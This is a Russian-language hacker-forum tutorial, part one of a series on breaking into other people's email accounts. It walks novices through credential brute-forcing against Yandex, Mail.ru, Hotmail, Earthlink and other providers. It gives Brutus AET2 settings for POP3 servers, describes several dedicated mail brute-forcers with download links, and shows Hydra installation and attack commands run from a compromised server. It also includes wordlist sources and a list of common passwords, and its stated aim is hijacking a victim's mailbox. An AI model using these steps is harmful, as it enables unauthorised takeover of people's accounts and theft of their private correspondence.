За ашипки и очепятки в статьях ответственности не несу.</span>
<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Взлом e-mail<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="display: block; text-align: center"><!--coloro: blue-->[color= blue]<!--/coloro-->ЧАСТЬ 1.<!--colorc-->[/color]<!--/colorc--></span>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">"Intro"<!--colorc-->[/color]<!--/colorc--></span></span>
Приветствую каждого кто читает эту статью. От кульного кулхацкера и до тех кто хочет им стать. Статья написана с целью помочь ньюбесам разобраться в принципах взлома почтовых ящиков как с помощью спец. софта созданного для этих целей, так и с помощью "мозгов" так сказать.
В данной статье будут рассмотрены не только принципы взлома почтовиков, но и так же будет отчасти выложен софт необходимый для этого и соответственно линки на видео, которое есть на нашем любимом античате. Так же будет выложен список ЧАВО и пути их решения.
<!--coloro: green-->[color= green]<!--/coloro-->(Все это в конце статьи) <!--colorc-->[/color]<!--/colorc-->
В целом статья ориентирована на то, чтобы у новичков в этом деле не возникало больше вопросов типа "Как взломать мыльник на мэйл.сру?", ибо достали вы уже народ с этими вопросами, поэтому вам и говорят в ваших топиках, что мол тема заезжена и все такое, что приводит к тем ответам на ваши вопросы, которых вы не ожидаете.
Постарайтесь максимально впитать весь материал, который изложен ниже и не задавать глупых вопросов.
Пытайтесь сами решать свои вопросы в плане взлома ибо ][акер есть самоучка.
Итак, приступим.
Существует достаточно много способов взлома почтовых ящиков в не зависимости от того на каком домене они распологаются.
От простого нудного брута до кражи Cookie. Рассмотрим каждый из них подробно.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(1): Брут.<!--colorc-->[/color]<!--/colorc--></span></span>
Брут-это достаточно долгий процесс взлома, если смотреть со стороны. Так сказать, лобовая атака. При этом время, которое можно потратить на взлом этим способом напрямую зависит от чела, которого ты ломаешь. Будь то ламер или вумный юзверь, либо ][ацкер.
Поскольку от образованности чела в этом деле зависит длинна и сложность пассворда, который он поставит себе на почтовик.
Углубимся в этот метод взлома и рассмотрим соответствующий софт, необходимый для этого.
Первой и наиболее распространенной прогой для взлома почтовиков является <!--coloro: aqua-->[color= aqua]<!--/coloro-->BrutusAET2.<!--colorc-->[/color]<!--/colorc-->
Нам потребуется:
1) Программа для переборки паролей BrutusAET2 , которую можно скачать отсюда:
• http://rapidshare.de/files/35508241/BrutusAET2.rar.html
2) Словарики ,которые можно взять отсюда:
• http://www.passwords.ru/dic.php
• http://www.insidepro.com/eng/download.shtml
• http://www.outpost9.com/files/WordLists.html
• http://www.acolytez.com/dict/
• http://www.phreak.com/html/wordlists.shtml
• http://www.mobilstar.ru/files/dict/
3) Прямые руки.
К примеру приведу угон мыльника на @yandex.ru.
<!--coloro: lime-->[color= lime]<!--/coloro-->
Настройка программы для переборки паролей BrutusAET2:<!--colorc-->[/color]<!--/colorc-->
1) Открыли программу.
2) В поле Target пишем pop.yandex.ru
3) В поле Type выбираем POP3
<!--coloro: lime-->[color= lime]<!--/coloro-->Connection Options:<!--colorc-->[/color]<!--/colorc-->
1) Port ставим 110.
2) Connections ставим на максимум т.е 60.
3) Timeout ставим на максимум т.е 60
<!--coloro: lime-->[color= lime]<!--/coloro-->POP3 options:<!--colorc-->[/color]<!--/colorc-->
Не трогаем, это для хакеров =)
<!--coloro: lime-->[color= lime]<!--/coloro-->Authentication options:<!--colorc-->[/color]<!--/colorc-->
Если мы хотим брутить список мыльников, тогда нам надо создать текстовик, назовём его users.txt ,туда значит закидываем списки юзеров.
Например:
Vasja_pupkin
Abcdefgh
Abcabc
Лезем в прогу там ставим галочку около Username.
Use Username: указываем путь к списку юзеров.
Переходим к списку паролей…
Создаем значит текстовик words.txt и туда пихаем пароли.
Например:
Password
Pass
123
Лезем в прогу и выбираем
Pass mode : Word list
Pass file : указываем путь к списку паролей.
Если @mail.ru просто ставим в Target : pop.mail.ru и остальное всё тоже самое.
Если @bk.ru просто ставим в Target : pop.bk.ru и остальное всё тоже самое.
Если @list.ru просто ставим в Target : pop.list.ru и остальное всё тоже самое.
Если @inbox.ru просто ставим в Target : pop.inbox.ru и остальное всё тоже самое.
по примерам можно сделать вывод,что если мыло на зоне ааа.ru значит и POP сервер будет pop.ааа.ru
Вобщем всё должно получится как на скриншоте :
После всего этого Нажимаем Start и Брут пошёл.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://www.securitylab.ru/<!--colorc-->[/color]<!--/colorc-->
Программулька достаточно давно живет в инете и получила признание у многих взломщиков. ОДнако в нынешнее время наблюдаются небольшие глюки у этой проги. Например, бывает так, что в процессе брута, если пасс будет стоять в конце (200 место в словаре к примеру), то она может пропустить этот пасс.
Линчо у меня бывало так, что она находила пассворд тока со второго круга а первый раз пропускала. ОДним словом, прога хорошая, многофункциональная. Способная брутить мыльники не зависимо от того, на каком домене распологается почтовик. ОДнако для нее важное значение играет расположение правильного пассворда в словаре.
А именно, его позиция среди других слов. Чем оно ближе, тем для вас же лучше. И это касается не только именно этой проги, но и также остальных. Так что, прежде чем исользовать её, пораскиньте мозгами какие ключевые слова задать перед генерацией словаря.
Для генерации словаря хорошо подойдет <!--coloro: aqua-->[color= aqua]<!--/coloro-->PassWordsPro<!--colorc-->[/color]<!--/colorc-->. Программа кульная, предназначенная не только для генерации слов, но и так же для генерации хешей. Таких как md4, md5, MSCash, Sha-1, MySQL....
ПОлностью описывать все ее функции не буду. Сами разберетесь, когда придет время для расшифровки хешей. Да и объяснение принципов расшифровки и генерации хешей не относится к этой теме.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://www.insidepro.com/download/passwordspro.zip<!--colorc-->[/color]<!--/colorc-->
Если вышеизложеной информации вам не достаточно по использование Brutus AET2, то вот урл на видео:
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/download_109.html<!--colorc-->[/color]<!--/colorc-->
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(2): Mail_ru_brut_by_Zlo_v3.0.<!--colorc-->[/color]<!--/colorc--></span></span>
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://www.xakbios.net/<!--colorc-->[/color]<!--/colorc-->
Эта прога даже легче Brutus, если сравнивать их две. КОРоче, постараюсь обьяснить все по пальцам. Тут даже никакого ФАКА не понадобиться. КОроче, значит так. Софтвина эта начинает работать тока когда заходишь на пагу самого Зло.
Ну, точнее вместе с запуском проги запускается пага разработчика. И ни что с этим не поделаешь, уж так наверное захотелось её создателю, чтобы больше народу заходило на его портал. Ну да ладно, ближе к телу. Поле Mail;Pass. Тут ничего менять не стоит. Просто создаешь на системом логическом разделе своего харда текстовичок с названием unr.txt.
Кидаешь туда "куцэ" сгенереные тобой мыльники в таком виде:
Vasya_Pupkin@mail.ru;qwerty.
Vasya_Pupkin@mail.ru;askjdh
Vasya_Pupkin@mail.ru;sakajshds
Ну где тут мейлер а где пасс думаю видно. В поле Save Good а именно в текстовичке ssafsa.txt, который ты должен тож создать на С:/> будут сэйвиться набрученные в процессе взлома пассы на почтовик(и).
Поля Theards и ТimeOut лучше оставь по дэфолту.
1)Position - показывает позицию пасса на котором остановился брут, если сделана пауза.
2) Ну и есессно ты мож брутить ч-з проксю.
Поле Theards соответственно (3), показывает число и скорость потоков в процессе брута.
Да и еще заранее оговорюсь. КАк правило, на паге Zlo предлагается купить не бажную версию данной софтвины с возможностью халявного апдейта. КОнечно можно купить, т.к некоторые версии этой проги не воспринимают русскоязычные слова в процессе брута.
Но вопрос покупки уже стоит перед вами. Если ты сынка банкира, то мож купить. Но думаю даже и таким охота халявы)))
Это мануал подробней некуда....
К вашему сожалению (а может и без сожаления) видео по использованию данной проги нет.
Но а если глянуть со стороны, что тут сложного. И без видео думаю справиться можно.
Софт с помощью которого можно сгенерить брут-лист наз-ся UIN Generator.
Так же, с помощью данной софтвинки можно сгенерить и листы пассов для брута асек.
Но это уже другая тема.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://www.proxy-forum.org/files/ic...n/generator.rar <!--colorc-->[/color]<!--/colorc-->
В поле номер (Один уин) вписываем мыло жертвы. В поле (Пароль), расположенное ниже отмечаем галочку на "словарь" и задаем путь к словарю, который вы хотите использовать для брута мыльника.
После всего этого нажимаем генерировать (на поле "Один номер") и пойдет процесс составления брут-листа.
Так, поехали дальше.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(3): Duk3NN Mail Bruter 3.03 F I N A L edition.<!--colorc-->[/color]<!--/colorc--></span></span>
В принципе, программулька не плохая. Может кто ее юзал чаще меня возразит. Но это его право и осуждать его и уж падавно спорить с ним не буду. Ибо каждый при своем мнении.
Познакомимся с ней поближе.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://jerimi-3434.narod.ru/mb303final.rar<!--colorc-->[/color]<!--/colorc-->
Здесь есть несколько вкладок. На вкладке <!--coloro: lime-->[color= lime]<!--/coloro-->Process<!--colorc-->[/color]<!--/colorc--> отображается непосредственно сам процесс брута.
Число потоков, используемых проксиков,лог брута и др. На этой вкладке и осуществляется запуск процесса брута.
Следующая вкладка <!--coloro: lime-->[color= lime]<!--/coloro-->Brute Options<!--colorc-->[/color]<!--/colorc-->. Тут задаются параметры для брута.
Тут можно брутить как с загрузкой mail;pass листа как в Mail.ruBrute, так и задав домен на котором находится почтовик жертвы.
Отличием этой проги то двух представленных выше является то, что тут можно загрузить лист прокси а не менять его в ручную каждый раз, когда это необходимо как, например в Mail.ruBrute. Не говоря уже о Brutus, которая работает вообще тока через Socks v4, v5.
@Mail.ru брутфорс.
===========================================
Описание файла настроек
-----------------------
[Item <порядковый номер>]
Title=<Название>
Host=<Хост>
Req=<Запрос (строчки в заросе разделяются знаком # Например: Req=POST mailserver.com HTTP/1.0#Referer: mailserver.com>
Data=<Информация отправляемая серверу>
Bytes=<Кол-во принимаемых байт>
Good=<Признак нужного ответа>
%login% - Заменяется на имя пользоавтеля
%pass% - Заменяется на пароль
%login% И %pass% могут быть в Req и Data одновременно.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(4): Nextmail.ru Bruteforce.<!--colorc-->[/color]<!--/colorc--></span></span>
Брутфорс для подбора паролей к почтовым ящикам на nextmail.ru включая поддомены:
nextmail.ru
nxt.ru
email.su
russian.ru
xaker.ru
students.ru
mail2k.ru
dezigner.ru
programist.ru
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://www.xicq.org/pub/icq/brutefo..._bruteforce.rar<!--colorc-->[/color]<!--/colorc-->
Программулька проста в освоении. И не освоить ее может тока самый последний ламер. Поля Theards, Remains и Processed мы рассматиривать не будем. В этом нет надобности, потому что значение этих полей такое же как и в Mail.ru Brute.
Рассмотрим поля ниже. Хотя они такие же как в Mail.ru Brute, но коль уж я сказал про них, то приступим. Поле Inlist. Тут задается путь к брут-листу, который будет в виде блаблабла@nextmail.ru;мухосранск.
Гинерить его думаю догадываетесь чем. (Пасс-лист)
Поле Good. Тут задается путь к тестовичку в который будут скидываться правильно набрученные пароли.
Theards: потоки (соответственно)
Autosave: порядок сохранения работы в процессе брута.
После задания всех настроек жмем OK и start. И пляшем с музыкой и бубнами, чтобы брут оказался удачным.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(5): Yandex Mail Bruteforcer.<!--colorc-->[/color]<!--/colorc--></span></span>
Программулька достаточно примитивна, поэтому не вижу надобности описывать че куда записывать.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: <span style="font-style: italic">[хз - пробивайте по Гуглу. *примеч. Kestrel]<!--colorc-->[/color]<!--/colorc--></span>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(6): Hotmail bruteforce.<!--colorc-->[/color]<!--/colorc--></span></span>
Прога, которая хорошо чебя зарекомендовала во взломе почтовиков всем известного домена Hotmail.
Ну, описывать ее я не буду, потому что принцип действия у неё такой же, как и у таких прог этого семейства (Nextmail bruteforce и др.)
<!--coloro: yellow-->[color= yellow]<!--/coloro-->
Скачать: http://jerimi-3434.narod.ru/hotmail.rar<!--colorc-->[/color]<!--/colorc-->
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(7): Earthlink.net bruteforce.<!--colorc-->[/color]<!--/colorc--></span></span>
Программа для перебора паролей на знаменитом почтовом сервисе earthlink.net, включая все его поддомены.
Если мыло давно не использовалось, то оно замораживается, и если у вас не получается зайти в почту, используя сбрученный логин и пасс, то этот аккаунт скорее заблокирован, чем программа дала сбой.
Проверить емейл на пригодность можно тут:
<!--coloro: yellow-->[color= yellow]<!--/coloro-->(https://myaccount.earthlink.net/cam/tra … &add=1)<!--colorc-->[/color]<!--/colorc-->
Принцип работы такой же, как и у вышепредставленной проги.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://lifar.com.ru/content/uploads/erth.rar<!--colorc-->[/color]<!--/colorc-->
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(8): Hydra.<!--colorc-->[/color]<!--/colorc--></span></span>
Сразу оговорюсь для новичков. Чтобы юзать эту прогу для взлома мыльников нужно иметь шелл. ЧТо такое шелл и с чем его едят думаю вас известно. Но если нет, то вот вам небольшой манульчик:
<!--coloro: aqua-->[color= aqua]<!--/coloro-->
Shell-аккаунт - что это?<!--colorc-->[/color]<!--/colorc-->
Тык!
Hydra в основном используется для взлома, когда имеется шелл. Чтобы заиметь шелл, нужно похатчить
сервант. Как вы будете это делать это уже ваша забота. К тому же описание получения шелла будет
выходить за рамки этой статьи.
Как правило она используется и работает под Linux или Unix. Одним словом на любой никсовой ОС.
Версия для Unix'a/Linux'a.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->
Скачать: http://thc.org/download.php?t=r&f=h … src.tar.gz
Сорцы: http://jerimi-3434.narod.ru/hydra-5.3-src.tar.gz
<!--colorc-->[/color]<!--/colorc-->
Но так же есть и версия под форточки (Win). Такую версию хорошо юзать, если имеешь бычью скорость инета.
<!--coloro: fuchsia-->[color= fuchsia]<!--/coloro-->Версия для Windows.<!--colorc-->[/color]<!--/colorc-->
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/download_110.html<!--colorc-->[/color]<!--/colorc-->
Как заливать на шелл Гидру, ньюбесам думаю будет интересно. Поэтому я выложу последовательность заливки на шелл. Хотя описание где-то было на ачате. Ну да ладно, принцип один.
Сначала стянем архив.
wget http://thc.org/download.php?t=r&f=h … src.tar.gz
Распаковываем
gzip -d hydra-4.7-src.tar.gz
tar -xf hydra-4.7-src.tar
или
tar -xzf hydra-4.7-src.tar.gz
И ставим
cd hydra-4.7-src
./configure
make
make install
можно копирнуть назад и удалить исходники
cp hydra ..
cd ..
rm -rf hydra-4.7-src
Работаем
./hydra (для справки)
./hydra -l lamer -P pass.txt -w 20 -t 10 pop.server pop3
для подбора пароля из словаря pass.txt к логину lamer
на сервере pop.server, timeout=20 sec, потоков 10.
================================================== ==============
Приведу список наиболее часто используемых паролей для почтовиков:
12345 0000
123456 000000
1234567 111
12345678 1111
123456789 11111
1234567890 11111
0987654321 111111
1029384756 123
192837465 123123
11111 123321
123123 1234
666999 12345
999666 123456
qwerty 1234567
admin 123654
adminpass 4444
qweqwe 555
qweqweqwe 55555
asdf 555555
asdfg 654321
pass 666
password 666666
parol 666999
hack 777
hacker 7777
hackme 777777
keyboard 7777777
access
========================================
Тут можно скачать словари для брута.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать:
1) http://advlamer.narod.ru/brute.htm
2) http://advlamer.narod.ru/dict/advlamer-digits.rar
3) http://www.hackersplayground.org/wordlists.html
4) http://passcrack.spb.ru/modules/Fil...c/passcrack.rar
5) http://advlamer.narod.ru/dict/advlamer-digits.rar
6) http://freeware32.ru/index.php?program= … onary_Tool
7) http://www.passwords.ru/dic.php
ftp://ftp.cerias.purdue.edu/pub/dict/<!--colorc-->[/color]<!--/colorc--><span style="display: block; text-align: right">to be continued...</span>
